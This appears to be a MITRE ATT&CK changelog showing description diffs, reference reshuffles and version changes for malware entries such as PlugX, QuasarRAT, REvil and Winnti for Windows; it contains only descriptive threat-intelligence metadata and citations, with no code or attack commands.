>//attack.mitre.org/groups/G0098) in targeted attacks in East>//attack.mitre.org/groups/G0098) in targeted attacks in East
> Asia including Taiwan, Japan, and Hong Kong.(Citation: Tren> Asia including Taiwan, Japan, and Hong Kong.(Citation: Tren
>dMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloade>dMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloade
>r June 2018) [PLEAD](https://attack.mitre.org/software/S0435>r June 2018) [PLEAD](https://attack.mitre.org/software/S0435
>) has also been referred to as [TSCookie](https://attack.mit>) has also been referred to as [TSCookie](https://attack.mit
>re.org/software/S0436), though more recent reporting indicat>re.org/software/S0436), though more recent reporting indicat
>es likely separation between the two.(Citation: JPCert TSCoo>es likely separation between the two. [PLEAD](https://attack
>kie March 2018)(Citation: JPCert PLEAD Downloader June 2018)>.mitre.org/software/S0435) was observed in use as early as M
> >arch 2017.(Citation: JPCert TSCookie March 2018)(Citation: J
 >PCert PLEAD Downloader June 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
values_changed
STIX FieldOld valueNew Value
modified2020-07-04 01:44:16.182000+00:002022-04-15 11:32:25.173000+00:00
description[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)
external_references[1]['source_name']PLEADTrend Micro PLEAD RTLO
external_references[1]['description']PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.
external_references[3]['source_name']JPCert PLEAD Downloader June 2018PLEAD
external_references[3]['description']Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)(Citation: TrendMicro BlackTech June 2017)
external_references[4]['source_name']JPCert TSCookie March 2018JPCert PLEAD Downloader June 2018
external_references[4]['description']Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
external_references[5]['source_name']Trend Micro PLEAD RTLOJPCert TSCookie March 2018
external_references[5]['description']Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
external_references[5]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsHannah Simes, BT Security

[S0013] PlugX

Current version: 3.0

Version changed from: 2.1 → 3.0


Old Description
New Description
t1[PlugX](https://attack.mitre.org/software/S0013) is a remotet1[PlugX](https://attack.mitre.org/software/S0013) is a remote
> access tool (RAT) that uses modular plugins. It has been us> access tool (RAT) with modular plugins that has been used b
>ed by multiple threat groups. (Citation: Lastline PlugX Anal>y multiple threat groups.(Citation: Lastline PlugX Analysis)
>ysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: >(Citation: FireEye Clandestine Fox Part 2)(Citation: New Dra
>New DragonOK) (Citation: Dell TG-3390)>gonOK)(Citation: Dell TG-3390)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttp://labs.lastline.com/an-analysis-of-plugx
external_referenceshttps://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 21:43:42.587000+00:002022-04-15 16:30:28.192000+00:00
description[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390)
external_references[1]['source_name']PlugXDestroyRAT
external_references[1]['description'](Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013)(Citation: CIRCL PlugX March 2013)
external_references[2]['source_name']DestroyRATKaba
external_references[2]['description'](Citation: CIRCL PlugX March 2013)(Citation: FireEye Clandestine Fox Part 2)
external_references[3]['source_name']SoguPlugX
external_references[4]['source_name']KabaKorplug
external_references[4]['description'](Citation: FireEye Clandestine Fox Part 2)(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)
external_references[5]['source_name']KorplugSogu
external_references[5]['description'](Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013)
external_references[6]['source_name']Lastline PlugX AnalysisThoper
external_references[6]['description']Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.(Citation: Novetta-Axiom)
external_references[7]['source_name']FireEye Clandestine Fox Part 2TVT
external_references[7]['description']Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.(Citation: Novetta-Axiom)
external_references[8]['source_name']New DragonOKCIRCL PlugX March 2013
external_references[8]['description']Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
external_references[8]['url']http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf
external_references[10]['source_name']CIRCL PlugX March 2013New DragonOK
external_references[10]['description']Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.
external_references[10]['url']http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdfhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'}
external_references{'source_name': 'FireEye Clandestine Fox Part 2', 'description': 'Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.', 'url': 'https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html'}
external_references{'source_name': 'Lastline PlugX Analysis', 'description': 'Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.', 'url': 'http://labs.lastline.com/an-analysis-of-plugx'}
x_mitre_aliasesThoper
x_mitre_aliasesTVT

[S0262] QuasarRAT

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[QuasarRAT](https://attack.mitre.org/software/S0262) is an ot1[QuasarRAT](https://attack.mitre.org/software/S0262) is an o
>pen-source, remote access tool that is publicly available on>pen-source, remote access tool that has been publicly availa
> GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262>ble on GitHub since at least 2014. [QuasarRAT](https://attac
>) is developed in the C# language. (Citation: GitHub QuasarR>k.mitre.org/software/S0262) is developed in the C# language.
>AT) (Citation: Volexity Patchwork June 2018)>(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork Ju
 >ne 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-22 13:57:03.434000+00:002022-08-02 15:36:30.238000+00:00
description[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018)[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
external_references[3]['source_name']GitHub QuasarRATSecurelist APT10 March 2021
external_references[3]['description']MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.
external_references[3]['url']https://github.com/quasar/QuasarRAThttps://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
external_references[4]['source_name']Volexity Patchwork June 2018TrendMicro Patchwork Dec 2017
external_references[4]['description']Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
external_references[4]['url']https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
external_references[5]['source_name']TrendMicro Patchwork Dec 2017GitHub QuasarRAT
external_references[5]['description']Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
external_references[5]['url']https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdfhttps://github.com/quasar/QuasarRAT
external_references[6]['source_name']Securelist APT10 March 2021Volexity Patchwork June 2018
external_references[6]['description']GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
external_references[6]['url']https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/
x_mitre_version1.22.0

[S0496] REvil

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[REvil](https://attack.mitre.org/software/S0496) is a ransomt1[REvil](https://attack.mitre.org/software/S0496) is a ransom
>ware family that has been linked to the [GOLD SOUTHFIELD](ht>ware family that has been linked to the [GOLD SOUTHFIELD](ht
>tps://attack.mitre.org/groups/G0115) group and operated as r>tps://attack.mitre.org/groups/G0115) group and operated as r
>ansomware-as-a-service (RaaS) since at least April 2019. [RE>ansomware-as-a-service (RaaS) since at least April 2019. [RE
>vil](https://attack.mitre.org/software/S0496) is highly conf>vil](https://attack.mitre.org/software/S0496), which as been
>igurable and shares code similarities with the GandCrab RaaS> used against organizations in the manufacturing, transporta
>.(Citation: Secureworks REvil September 2019)(Citation: Inte>tion, and electric sectors, is highly configurable and share
>l 471 REvil March 2020)(Citation: Group IB Ransomware May 20>s code similarities with the GandCrab RaaS.(Citation: Secure
>20)>works REvil September 2019)(Citation: Intel 471 REvil March 
 >2020)(Citation: Group IB Ransomware May 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 19:38:51.122000+00:002022-05-24 21:09:01.019000+00:00
description[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)
external_references[3]['source_name']Secureworks REvil September 2019Talos Sodinokibi April 2019
external_references[3]['description']Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.
external_references[3]['url']https://www.secureworks.com/research/revil-sodinokibi-ransomwarehttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
external_references[4]['source_name']Intel 471 REvil March 2020Secureworks REvil September 2019
external_references[4]['description']Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[4]['url']https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/https://www.secureworks.com/research/revil-sodinokibi-ransomware
external_references[5]['source_name']Group IB Ransomware May 2020Cylance Sodinokibi July 2019
external_references[5]['description']Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[5]['url']https://www.group-ib.com/whitepapers/ransomware-uncovered.htmlhttps://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html
external_references[6]['source_name']Kaspersky Sodin July 2019Group IB Ransomware May 2020
external_references[6]['description']Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.
external_references[6]['url']https://securelist.com/sodin-ransomware/91473/https://www.group-ib.com/whitepapers/ransomware-uncovered.html
external_references[8]['source_name']Cylance Sodinokibi July 2019Intel 471 REvil March 2020
external_references[8]['description']Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.
external_references[8]['url']https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.htmlhttps://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
external_references[9]['source_name']Secureworks GandCrab and REvil September 2019Kaspersky Sodin July 2019
external_references[9]['description']Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.
external_references[9]['url']https://www.secureworks.com/blog/revil-the-gandcrab-connectionhttps://securelist.com/sodin-ransomware/91473/
external_references[10]['source_name']Talos Sodinokibi April 2019McAfee Sodinokibi October 2019
external_references[10]['description']Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
external_references[10]['url']https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.htmlhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/
external_references[11]['source_name']McAfee Sodinokibi October 2019Picus Sodinokibi January 2020
external_references[11]['description']McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.
external_references[11]['url']https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware
external_references[13]['source_name']Picus Sodinokibi January 2020Secureworks GandCrab and REvil September 2019
external_references[13]['description']Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
external_references[13]['url']https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomwarehttps://www.secureworks.com/blog/revil-the-gandcrab-connection
x_mitre_version1.22.0

[S0448] Rising Sun

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[Rising Sun](https://attack.mitre.org/software/S0448) is a mt1[Rising Sun](https://attack.mitre.org/software/S0448) is a m
>odular backdoor malware used extensively in Operation [Sharp>odular backdoor that was used extensively in [Operation Shar
>shooter](https://attack.mitre.org/groups/G0104). The malware>pshooter](https://attack.mitre.org/campaigns/C0013) between 
> has been observed targeting nuclear, defense, energy, and f>2017 and 2019. [Rising Sun](https://attack.mitre.org/softwar
>inancial services companies across the world. [Rising Sun](h>e/S0448) infected at least 87 organizations around the world
>ttps://attack.mitre.org/software/S0448) uses source code fro>, including nuclear, defense, energy, and financial service 
>m [Lazarus Group](https://attack.mitre.org/groups/G0032)'s T>companies. Security researchers assessed [Rising Sun](https:
>rojan Duuzer.(Citation: McAfee Sharpshooter December 2018)>//attack.mitre.org/software/S0448) included some source code
 > from [Lazarus Group](https://attack.mitre.org/groups/G0032)
 >'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 201
 >8)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-30 03:13:38.515000+00:002022-10-13 15:46:29.677000+00:00
description[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)
x_mitre_version1.02.0

[S0094] Trojan.Karagany

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[Trojan.Karagany](https://attack.mitre.org/software/S0094) it1[Trojan.Karagany](https://attack.mitre.org/software/S0094) i
>s a modular remote access tool used for recon and linked to >s a modular remote access tool used for recon and linked to 
>[Dragonfly](https://attack.mitre.org/groups/G0035) and [Drag>[Dragonfly](https://attack.mitre.org/groups/G0035). The sour
>onfly 2.0](https://attack.mitre.org/groups/G0074). The sourc>ce code for [Trojan.Karagany](https://attack.mitre.org/softw
>e code for [Trojan.Karagany](https://attack.mitre.org/softwa>are/S0094) originated from Dream Loader malware which was le
>re/S0094) originated from Dream Loader malware which was lea>aked in 2010 and sold on underground forums. (Citation: Syma
>ked in 2010 and sold on underground forums. (Citation: Syman>ntec Dragonfly)(Citation: Secureworks Karagany July 2019)(Ci
>tec Dragonfly)(Citation: Secureworks Karagany July 2019)(Cit>tation: Dragos DYMALLOY )
>ation: Dragos DYMALLOY ) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-14 22:38:11.328000+00:002022-04-19 14:57:44.862000+00:00
description[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )
external_references[3]['source_name']Symantec DragonflyDragos DYMALLOY
external_references[3]['description']Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.
external_references[3]['url']http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdfhttps://www.dragos.com/threat/dymalloy/
external_references[5]['source_name']Dragos DYMALLOY Symantec Dragonfly
external_references[5]['description']Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.
external_references[5]['url']https://www.dragos.com/threat/dymalloy/https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
x_mitre_version2.03.0

[S0141] Winnti for Windows

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[Winnti for Windows](https://attack.mitre.org/software/S0141t1[Winnti for Windows](https://attack.mitre.org/software/S0141
>) is a Trojan that has been used by multiple groups to carry>) is a modular remote access Trojan (RAT) that has been used
> out intrusions in varied regions from at least 2010 to 2016> likely by multiple groups to carry out intrusions in variou
>. One of the groups using this malware is referred to by the>s regions since at least 2010, including by one group referr
> same name, [Winnti Group](https://attack.mitre.org/groups/G>ed to as the same name, [Winnti Group](https://attack.mitre.
>0044); however, reporting indicates a second distinct group,>org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Ci
> [Axiom](https://attack.mitre.org/groups/G0001), also uses t>tation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti 
>he malware. (Citation: Kaspersky Winnti April 2013) (Citatio>April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The
>n: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti Apri> Linux variant is tracked separately under [Winnti for Linux
>l 2015) The Linux variant is tracked separately under [Winnt>](https://attack.mitre.org/software/S0430).(Citation: Chroni
>i for Linux](https://attack.mitre.org/software/S0430).(Citat>cle Winnti for Linux May 2019)
>ion: Chronicle Winnti for Linux May 2019) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-04 12:29:49.081000+00:002022-04-15 16:38:19.439000+00:00
description[Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)
external_references[1]['source_name']Kaspersky Winnti April 2013Microsoft Winnti Jan 2017
external_references[1]['description']Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.
external_references[1]['url']https://securelist.com/winnti-more-than-just-a-game/37029/https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/
external_references[2]['source_name']Microsoft Winnti Jan 2017Chronicle Winnti for Linux May 2019
external_references[2]['description']Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
external_references[2]['url']https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a
external_references[3]['source_name']Novetta Winnti April 2015401 TRG Winnti Umbrella May 2018
external_references[3]['description']Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.
external_references[3]['url']http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdfhttps://401trg.github.io/pages/burning-umbrella.html
external_references[4]['source_name']Chronicle Winnti for Linux May 2019Kaspersky Winnti April 2013
external_references[4]['description']Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.
external_references[4]['url']https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031ahttps://securelist.com/winnti-more-than-just-a-game/37029/
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
